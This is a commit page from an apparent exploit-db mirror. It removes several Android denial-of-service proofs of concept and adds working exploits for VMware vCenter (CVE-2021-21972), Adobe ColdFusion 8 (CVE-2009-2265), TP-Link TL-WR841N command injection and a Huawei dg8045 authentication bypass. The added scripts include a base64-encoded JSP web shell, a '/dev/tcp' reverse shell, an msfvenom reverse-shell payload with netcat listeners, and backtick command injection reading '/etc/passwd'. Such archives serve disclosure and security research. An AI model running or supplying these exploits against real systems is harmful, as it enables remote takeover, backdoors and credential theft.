bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2021-06-25

Browse source 
16 changes to exploits/shellcodes

BasicNote 1.1.9 - Denial of Service (PoC)
ColorNote 4.1.9 - Denial of Service (PoC)
Notepad notes 2.6.7 - Denial of Service (PoC)
Blacknote 2.2.1 - Denial of Service (PoC)
Inkpad Notepad & To do list 4.3.61 - Denial of Service (PoC)

GeoGebra 3D Calculator 5.0.511.0 - Denial of Service (PoC)
VMware vCenter Server RCE 6.5 / 6.7 / 7.0 - Remote Code Execution (RCE) (Unauthenticated)
Adobe ColdFusion 8 - Remote Command Execution (RCE)
TP-Link TL-WR841N - Command Injection
Huawei dg8045 - Authentication Bypass
This commit is contained in:
Offensive Security 2021-06-25 05:01:52 +00:00
parent 8e25002b7c
commit 135e56dda8
11 changed files with 362 additions and 211 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

35
exploits/android/dos/49938.py
View file

@ -1,35 +0,0 @@
# Exploit Title: BasicNote 1.1.9 - Denial of Service (PoC)
# Date: 2021-06-02
# Author: Brian Rodríguez
# Download Link: https://play.google.com/store/apps/details?id=notizen.basic.notes.notas.note.notepad&hl=es_MX
# Version: 1.1.9
# Category: DoS (Android)
##### Vulnerability #####
BasicNote - Notas, Bloc de notas is vulnerable to a DoS condition when two long lists of characters are being used when creating a note:
# STEPS #
# Open the program
# Create a new Note.
# Run the python exploit script payload.py, it will create a new payload.txt file
# Copy the content of the file "payload.txt"
# Paste the content from payload.txt twice in the new Note.
# Crashed
Successful exploitation will causes application stop working.
I have been able to test this exploit against Android 8.0.
##### PoC #####
#!/usr/bin/env python
buffer = "\x41" * 350000
try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print ("File created")
except:
print ("File cannot be created")

37
exploits/android/dos/49939.py
View file

@ -1,37 +0,0 @@
# Exploit Title: ColorNote 4.1.9 - Denial of Service (PoC)
# Date: 2021-06-02
# Author: Brian Rodríguez
# Download Link: https://play.google.com/store/apps/details?id=com.socialnmobile.dictapps.notepad.color.note&hl=es_MX
# Version: 4.1.9
# Category: DoS (Android)
##### Vulnerability #####
Color Note is vulnerable to a DoS condition when a long list of characters is being used.
# STEPS #
# Open the program
# Create a new Note.
# Run the python exploit script payload.py, it will create a new payload.txt file
# Copy the content of the file "payload.txt"
# Paste the content from payload.txt in the new note.
# Click the "Return" button twice.
# Start clicking the screen.
# Crashed
Successful exploitation will causes application stop working.
I have been able to test this exploit against Android 8.0.
##### PoC #####
--> payload.py <--
#!/usr/bin/env python
buffer = "\x41" * 350000
try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print ("File created")
except:
print ("File cannot be created")

35
exploits/android/dos/49940.py
View file

@ -1,35 +0,0 @@
# Exploit Title: Notepad notes 2.6.7 - Denial of Service (PoC)
# Date: 2021-06-02
# Author: Brian Rodríguez
# Download Link: https://play.google.com/store/apps/details?id=com.hlcsdev.x.notepad&hl=es_MX
# Version: 2.6.7
# Category: DoS (Android)
##### Vulnerability #####
Bloc de notas is vulnerable to a DoS condition when a long lists of characters is being used when creating a note:
# STEPS #
# Open the program.
# Create a new Note.
# Run the python exploit script payload.py, it will create a new payload.txt file
# Copy the content of the file "payload.txt"
# Paste the content from payload.txt twice in the new Note.
# Crashed
Successful exploitation will cause application to stop working.
I have been able to test this exploit against Android 8.0.
##### PoC #####
--> payload.py <--
#!/usr/bin/env python
buffer = "\x41" * 350000
try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print ("File created")
except:
print ("File cannot be created")

35
exploits/android/dos/49941.py
View file

@ -1,35 +0,0 @@
# Exploit Title: Blacknote 2.2.1 - Denial of Service (PoC)
# Date: 2021-06-02
# Author: Brian Rodríguez
# Download Link: https://play.google.com/store/apps/details?id=notepad.note.notas.notes.notizen&hl=es_MX
# Version: 2.2.1
# Category: DoS (Android)
##### Vulnerability #####
BlackNote Bloc de notas is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
# STEPS #
# Open the program.
# Create a new Note.
# Run the python exploit script payload.py, it will create a new payload.txt file
# Copy the content of the file "payload.txt"
# Paste the content from payload.txt twice in the new Note.
# Crashed
Successful exploitation will cause the application to stop working.
I have been able to test this exploit against Android 8.0.
##### PoC #####
--> payload.py <--
#!/usr/bin/env python
buffer = "\x41" * 350000
try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print ("File created")
except:
print ("File cannot be created")

35
exploits/android/dos/49946.txt
View file

@ -1,35 +0,0 @@
# Exploit Title: Inkpad Notepad & To do list 4.3.61 - Denial of Service (PoC)
# Date: 2021-06-03
# Author: Brian Rodríguez
# Download Link: https://play.google.com/store/apps/details?id=com.workpail.inkpad.notepad.notes&hl=es_MX
# Version: 4.3.61
# Category: DoS (Android)
##### Vulnerability #####
InkPad Bloc de notas - Tareas is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
# STEPS #
# Open the program.
# Create a new Note.
# Run the python exploit script payload.py, it will create a new payload.txt file
# Copy the content of the file "payload.txt"
# Paste the content from payload.txt twice in the new Note.
# Crashed
Successful exploitation will cause the application to stop working.
I have been able to test this exploit against Android 8.0.
##### PoC #####
--> payload.py <--
#!/usr/bin/env python
buffer = "\x41" * 50000
try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print ("File created")
except:
print ("File cannot be created")

28
exploits/android/local/49656.py
View file

@ -1,28 +0,0 @@
# Exploit Title: GeoGebra 3D Calculator 5.0.511.0 - Denial of Service (PoC)
# Date: 2021-03-15
# Author: Brian Rodríguez
# Software Site: https://www.geogebra.org/download
# Download Link: https://play.google.com/store/apps/details?id=org.geogebra.android.g3d&utm_source=Download+page&utm_medium=Website&utm_campaign=3D+Calculator+for+Android
# Version: 5.0.511.0
# Category: DoS (Android)
##### Vulnerability #####
Graficador GeoGebra 3D is vulnerable to a DoS condition when a long list of characters is being used in field "Entrada..." text box.
Successful exploitation will causes application stop working.
I have been able to test this exploit against Android 10.0.
##### PoC #####
#!/usr/bin/env python
buffer = "\x41" * 8000
try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print ("File created")
except:
print ("File cannot be created")

121
exploits/cfm/webapps/50057.py Executable file
View file

@ -0,0 +1,121 @@
# Exploit Title: Adobe ColdFusion 8 - Remote Command Execution (RCE)
# Google Dork: intext:"adobe coldfusion 8"
# Date: 24/06/2021
# Exploit Author: Pergyz
# Vendor Homepage: https://www.adobe.com/sea/products/coldfusion-family.html
# Version: 8
# Tested on: Microsoft Windows Server 2008 R2 Standard
# CVE : CVE-2009-2265
#!/usr/bin/python3
from multiprocessing import Process
import io
import mimetypes
import os
import urllib.request
import uuid
class MultiPartForm:
def __init__(self):
self.files = []
self.boundary = uuid.uuid4().hex.encode('utf-8')
return
def get_content_type(self):
return 'multipart/form-data; boundary={}'.format(self.boundary.decode('utf-8'))
def add_file(self, fieldname, filename, fileHandle, mimetype=None):
body = fileHandle.read()
if mimetype is None:
mimetype = (mimetypes.guess_type(filename)[0] or 'application/octet-stream')
self.files.append((fieldname, filename, mimetype, body))
return
@staticmethod
def _attached_file(name, filename):
return (f'Content-Disposition: form-data; name="{name}"; filename="{filename}"\r\n').encode('utf-8')
@staticmethod
def _content_type(ct):
return 'Content-Type: {}\r\n'.format(ct).encode('utf-8')
def __bytes__(self):
buffer = io.BytesIO()
boundary = b'--' + self.boundary + b'\r\n'
for f_name, filename, f_content_type, body in self.files:
buffer.write(boundary)
buffer.write(self._attached_file(f_name, filename))
buffer.write(self._content_type(f_content_type))
buffer.write(b'\r\n')
buffer.write(body)
buffer.write(b'\r\n')
buffer.write(b'--' + self.boundary + b'--\r\n')
return buffer.getvalue()
def execute_payload():
print('\nExecuting the payload...')
print(urllib.request.urlopen(f'http://{rhost}:{rport}/userfiles/file/{filename}.jsp').read().decode('utf-8'))
def listen_connection():
print('\nListening for connection...')
os.system(f'nc -nlvp {lport}')
if __name__ == '__main__':
# Define some information
lhost = '10.10.16.4'
lport = 4444
rhost = "10.10.10.11"
rport = 8500
filename = uuid.uuid4().hex
# Generate a payload that connects back and spawns a command shell
print("\nGenerating a payload...")
os.system(f'msfvenom -p java/jsp_shell_reverse_tcp LHOST={lhost} LPORT={lport} -o {filename}.jsp')
# Encode the form data
form = MultiPartForm()
form.add_file('newfile', filename + '.txt', fileHandle=open(filename + '.jsp', 'rb'))
data = bytes(form)
# Create a request
request = urllib.request.Request(f'http://{rhost}:{rport}/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/{filename}.jsp%00', data=data)
request.add_header('Content-type', form.get_content_type())
request.add_header('Content-length', len(data))
# Print the request
print('\nPriting request...')
for name, value in request.header_items():
print(f'{name}: {value}')
print('\n' + request.data.decode('utf-8'))
# Send the request and print the response
print('\nSending request and printing response...')
print(urllib.request.urlopen(request).read().decode('utf-8'))
# Print some information
print('\nPrinting some information for debugging...')
print(f'lhost: {lhost}')
print(f'lport: {lport}')
print(f'rhost: {rhost}')
print(f'rport: {rport}')
print(f'payload: {filename}.jsp')
# Delete the payload
print("\nDeleting the payload...")
os.system(f'rm {filename}.jsp')
# Listen for connections and execute the payload
p1 = Process(target=listen_connection)
p1.start()
p2 = Process(target=execute_payload)
p2.start()
p1.join()
p2.join()

75
exploits/hardware/webapps/50058.py Executable file
View file

@ -0,0 +1,75 @@
# Exploit Title: TP-Link TL-WR841N - Command Injection
# Date: 2020-12-13
# Exploit Author: Koh You Liang
# Vendor Homepage: https://www.tp-link.com/
# Software Link: https://static.tp-link.com/TL-WR841N(JP)_V13_161028.zip
# Version: TL-WR841N 0.9.1 4.0
# Tested on: Windows 10
# CVE : CVE-2020-35575
import requests
import sys
import time
try:
_ = sys.argv[2]
payload = ' '.join(sys.argv[1:])
except IndexError:
try:
payload = sys.argv[1]
except IndexError:
print("[*] Command not specified, using the default `cat etc/passwd=`")
payload = 'cat etc/passwd'
# Default credentials is admin:admin - replace with your own
cookies = {
'Authorization': 'Basic YWRtaW46YWRtaW4='
}
headers = {
'Host': '192.168.0.1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko=/20100101 Firefox/84.0',
'Accept': '*/*',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'text/plain',
'Content-Length': '197',
'Origin': 'http://192.168.0.1',
'Connection': 'close',
'Referer': 'http://192.168.0.1/mainFrame.htm',
}
data1 = \
'''[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,8\r\nmaxHopCount=20\r\ntimeout=50\r\nnumberOfTries=1\r\nhost="`{}`"\r\ndataBlockSize=64\r\nX_TP_ConnName=ewan_ipoe_d\r\ndiagnosticsState=Requested\r\nX_TP_HopSeq=0\r\n'''.format(payload)
response1 = requests.post('http://192.168.0.1/cgi?2', headers=headers, cookies=cookies, data=data1, verify=False)
print('[+] Sending payload...')
try:
response1.text.splitlines()[0]
except IndexError:
sys.exit('[-] Cannot get response. Please check your cookie.')
if response1.text.splitlines()[0] != '[error]0':
sys.exit('[*] Router/Firmware is not vulnerable.')
data2 = '[ACT_OP_TRACERT#0,0,0,0,0,0#0,0,0,0,0,0]0,0\r\n'
response2 = requests.post('http://192.168.0.1/cgi?7', headers=headers, cookies=cookies, data=data2, verify=False)
print('[+] Receiving response from router...')
time.sleep(0.8) # Buffer time for traceroute to succeed
data3 = '''[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,3\r\ndiagnosticsState\r\nX_TP_HopSeq\r\nX_TP_Result\r\n'''
response3 = requests.post('http://192.168.0.1/cgi?1', headers=headers, cookies=cookies, data=data3, verify=False)
if '=:' in response3.text.splitlines()[3]:
print('[-] Command not supported.')
else:
print('[+] Exploit successful!')
for line_number, line in enumerate(response3.text.splitlines()):
try:
if line_number == 3:
print(line[12:])
if line_number > 3 and line != '[error]0':
print(line)
if 'not known' in line:
break
except IndexError:
break

45
exploits/hardware/webapps/50059.txt Normal file
View file

@ -0,0 +1,45 @@
# Title: Huawei dg8045 - Authentication Bypass
# Date: 2020-06-24
# Author: Abdalrahman Gamal
# Vendor Homepage: www.huawei.com
# Version: dg8045
# Hardware Version: VER.A
#POC:
The default password of this router is the last 8 characters of the
device's serial number which exist in the back of the device.
An attacker can leak the serial number via the web app API like the
following:
************************Request************************
GET /api/system/deviceinfo HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.1/
X-Requested-With: XMLHttpRequest
Connection: close
************************Response************************
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Date: Thu, 24 Jun 2021 02:07 GMT+2
Connection: Keep-Alive
Content-Language: en
Content-Type: application/javascript
Content-Length: 141
while(1); /*{"DeviceName":"DG8045","SerialNumber":"21530369847SK9252081","ManufacturerOUI":"00E0FC","UpTime":81590,"HardwareVersion":"VER.A"}*/
You can use that serial number last 8 char/digits to login to the router.

117
exploits/multiple/webapps/50056.py Executable file
View file

@ -0,0 +1,117 @@
# Exploit Title: VMware vCenter Server RCE 6.5 / 6.7 / 7.0 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 06/21/2021
# Exploit Author: CHackA0101
# Vendor Homepage: https://kb.vmware.com/s/article/82374
# Software Link: https://www.vmware.com/products/vcenter-server.html
# Version: This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).
# Tested on: VMware vCenter version 6.5 (OS: Linux 4.4.182-1.ph1 SMP UTC 2019 x86_64 GNU/Linux)
# CVE: 2021-21972
# More Info: https://github.com/chacka0101/exploits/blob/master/CVE-2021-21972/README.md
#!/usr/bin/python2
import os
import urllib3
import argparse
import sys
import requests
import base64
import tarfile
import threading
import time
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
myargs=argparse.ArgumentParser()
myargs.add_argument('-T','--target',help='The IP address of the target',required=True)
myargs.add_argument('-L','--local',help='Your local IP',required=True)
args=myargs.parse_args()
def getprompt(x):
print ("(CHackA0101-GNU/Linux)$ "+ str(x))
def getpath(path="/usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/37/0/h5ngc.war/resources/shell4.jsp"):
fullpath="../" * 7 + path
return fullpath.replace('\\','/').replace('//','/')
def createbackdoor(localip):
# shell4.jsp
backdoor = "PGZvcm0gbWV0aG9kPSJHRVQiIGFjdGlvbj0iIj4KCTxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJjbWQiIC8+Cgk8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iRXhlYyEiIC8+CjwvZm9ybT4gPCUhCnB1YmxpYyBTdHJpbmcgZXNjKFN0cmluZyBzdHIpewoJU3RyaW5nQnVmZmVyIHNiID0gbmV3IFN0cmluZ0J1ZmZlcigpOwoJZm9yKGNoYXIgYyA6IHN0ci50b0NoYXJBcnJheSgpKQoJCWlmKCBjID49ICcwJyAmJiBjIDw9ICc5JyB8fCBjID49ICdBJyAmJiBjIDw9ICdaJyB8fCBjID49ICdhJyAmJiBjIDw9ICd6JyB8fCBjID09ICcgJyApCgkJCXNiLmFwcGVuZCggYyApOwoJCWVsc2UKCQkJc2IuYXBwZW5kKCImIyIrKGludCkoYyYweGZmKSsiOyIpOwoJcmV0dXJuIHNiLnRvU3RyaW5nKCk7Cn0gJT48JQpTdHJpbmcgY21kID0gcmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpOwppZiAoIGNtZCAhPSBudWxsKSB7CglvdXQucHJpbnRsbigiPHByZT5Db21tYW5kIHdhczogPGI+Iitlc2MoY21kKSsiPC9iPlxuIik7CglqYXZhLmlvLkRhdGFJbnB1dFN0cmVhbSBpbiA9IG5ldyBqYXZhLmlvLkRhdGFJbnB1dFN0cmVhbShSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKGNtZCkuZ2V0SW5wdXRTdHJlYW0oKSk7CglTdHJpbmcgbGluZSA9IGluLnJlYWRMaW5lKCk7Cgl3aGlsZSggbGluZSAhPSBudWxsICl7CgkJb3V0LnByaW50bG4oZXNjKGxpbmUpKTsKCQlsaW5lID0gaW4ucmVhZExpbmUoKTsKCX0KCW91dC5wcmludGxuKCI8L3ByZT4iKTsKfSAlPg=="
backdoor = base64.b64decode(backdoor).decode('utf-8')
f = open("shell4.jsp","w")
f.write(backdoor)
f.close()
# reverse.sh
# After decoding overwrite string 'CUSTOM_IP' for local IP
shell="IyEvYmluL2Jhc2gKYmFzaCAtaSA+JiAvZGV2L3RjcC9DVVNUT01fSVAvNDQzIDA+JjE="
shell=base64.b64decode(shell).decode('utf-8')
shell=shell.replace('CUSTOM_IP',localip)
f=open("reverse.sh","w")
f.write(shell)
f.close()
# Move on with the payload
payload_file=tarfile.open('payload.tar','w')
myroute=getpath()
getprompt('Adding web backdoor to archive')
payload_file.add("shell4.jsp", myroute)
myroute=getpath("tmp/reverse.sh")
getprompt('Adding bash backdoor to archive')
payload_file.add("reverse.sh", myroute)
payload_file.close()
# cleaning up a little bit
os.unlink("reverse.sh")
os.unlink("shell4.jsp")
getprompt('Backdoor file just was created.')
def launchexploit(ip):
res=requests.post('https://' + ip + '/ui/vropspluginui/rest/services/uploadova', files={'uploadFile':open('payload.tar', 'rb')}, verify=False, timeout=60)
if res.status_code == 200 and res.text == 'SUCCESS':
getprompt('Backdoor was uploaded successfully!')
return True
else:
getprompt('Backdoor failed to be uploaded. Target denied access.')
return False
def testshell(ip):
getprompt('Looking for shell...')
shell_path="/ui/resources/shell4.jsp?cmd=uname+-a"
res=requests.get('https://' + ip + shell_path, verify=False, timeout=60)
if res.status_code==200:
getprompt('Shell was found!.')
response=res.text
if True:
getprompt('Shell is responsive.')
try:
response=re.findall("b>(.+)</",response)[0]
print('$>uname -a')
print(response)
except:
pass
return True
else:
getprompt('Sorry. Shell was not found.')
return False
def opendoor(url):
time.sleep(3)
getprompt('Executing command.')
requests.get(url, verify=False, timeout=1800)
def executebackdoor(ip, localip):
url="https://"+ip+"/ui/resources/shell4.jsp?cmd=bash%20/tmp/reverse.sh"
t=threading.Thread(target=opendoor,args=(url,))
t.start()
getprompt('Setting up socket '+localip+':443')
os.system('nc -lnvp 443')
if len(sys.argv)== 1:
myargs.print_help(sys.stderr)
sys.exit(1)
createbackdoor(args.local)
uploaded=launchexploit(args.target)
if uploaded:
tested=testshell(args.target)
if tested:
executebackdoor(args.target, args.local)
getprompt("Execution completed!")

10
files_exploits.csv
View file

@ -6785,11 +6785,6 @@ id,file,description,date,author,type,platform,port
49898,exploits/windows/dos/49898.txt,"iDailyDiary 4.30 - Denial of Service (PoC)",2021-05-24,"Ismael Nava",dos,windows,
49906,exploits/windows/dos/49906.py,"RarmaRadio 2.72.8 - Denial of Service (PoC)",2021-05-26,"Ismael Nava",dos,windows,
49917,exploits/windows/dos/49917.py,"DupTerminator 1.4.5639.37199 - Denial of Service (PoC)",2021-06-01,"Brian Rodriguez",dos,windows,
49938,exploits/android/dos/49938.py,"BasicNote 1.1.9 - Denial of Service (PoC)",2021-06-03,"Brian Rodriguez",dos,android,
49939,exploits/android/dos/49939.py,"ColorNote 4.1.9 - Denial of Service (PoC)",2021-06-03,"Brian Rodriguez",dos,android,
49940,exploits/android/dos/49940.py,"Notepad notes 2.6.7 - Denial of Service (PoC)",2021-06-03,"Brian Rodriguez",dos,android,
49941,exploits/android/dos/49941.py,"Blacknote 2.2.1 - Denial of Service (PoC)",2021-06-03,"Brian Rodriguez",dos,android,
49946,exploits/android/dos/49946.txt,"Inkpad Notepad & To do list 4.3.61 - Denial of Service (PoC)",2021-06-04,"Brian Rodriguez",dos,android,
49952,exploits/ios/dos/49952.py,"Color Notes 1.4 - Denial of Service (PoC)",2021-06-04,"Geovanni Ruiz",dos,ios,
49953,exploits/ios/dos/49953.py,"Macaron Notes great notebook 5.5 - Denial of Service (PoC)",2021-06-04,"Geovanni Ruiz",dos,ios,
49954,exploits/ios/dos/49954.py,"My Notes Safe 5.3 - Denial of Service (PoC)",2021-06-04,"Geovanni Ruiz",dos,ios,
@ -11316,7 +11311,6 @@ id,file,description,date,author,type,platform,port
49653,exploits/windows/local/49653.py,"GeoGebra Graphing Calculator 6.0.631.0 - Denial Of Service (PoC)",2021-03-16,"Brian Rodriguez",local,windows,
49654,exploits/windows/local/49654.py,"GeoGebra Classic 5.0.631.0-d - Denial of Service (PoC)",2021-03-16,"Brian Rodriguez",local,windows,
49655,exploits/windows/local/49655.py,"GeoGebra CAS Calculator 6.0.631.0 - Denial of Service (PoC)",2021-03-16,"Brian Rodriguez",local,windows,
49656,exploits/android/local/49656.py,"GeoGebra 3D Calculator 5.0.511.0 - Denial of Service (PoC)",2021-03-16,"Brian Rodriguez",local,android,
49660,exploits/windows/local/49660.py,"FastStone Image Viewer 7.5 - .cur BITMAPINFOHEADER 'BitCount' Stack Based Buffer Overflow (ASLR & DEP Bypass)",2021-03-17,"Paolo Stagno",local,windows,
49661,exploits/windows/local/49661.txt,"VFS for Git 1.0.21014.1 - 'GVFS.Service' Unquoted Service Path",2021-03-18,"Mohammed Alshehri",local,windows,
49671,exploits/windows/local/49671.txt,"BRAdmin Professional 3.75 - 'BRA_Scheduler' Unquoted Service Path",2021-03-19,"Metin Yunus Kandemir",local,windows,
@ -44203,3 +44197,7 @@ id,file,description,date,author,type,platform,port
50053,exploits/php/webapps/50053.txt,"Online Library Management System 1.0 - 'Search' SQL Injection",2021-06-23,"Berk Can Geyikci",webapps,php,
50054,exploits/php/webapps/50054.py,"Online Library Management System 1.0 - Arbitrary File Upload Remote Code Execution (Unauthenticated)",2021-06-23,"Berk Can Geyikci",webapps,php,
50055,exploits/php/webapps/50055.txt,"Simple CRM 3.0 - 'email' SQL injection (Authentication Bypass)",2021-06-23,"Rinku Kumar",webapps,php,
50056,exploits/multiple/webapps/50056.py,"VMware vCenter Server RCE 6.5 / 6.7 / 7.0 - Remote Code Execution (RCE) (Unauthenticated)",2021-06-24,CHackA0101,webapps,multiple,
50057,exploits/cfm/webapps/50057.py,"Adobe ColdFusion 8 - Remote Command Execution (RCE)",2021-06-24,Pergyz,webapps,cfm,
50058,exploits/hardware/webapps/50058.py,"TP-Link TL-WR841N - Command Injection",2021-06-24,"Koh You Liang",webapps,hardware,
50059,exploits/hardware/webapps/50059.txt,"Huawei dg8045 - Authentication Bypass",2021-06-24,"Abdalrahman Gamal",webapps,hardware,

Can't render this file because it is too large.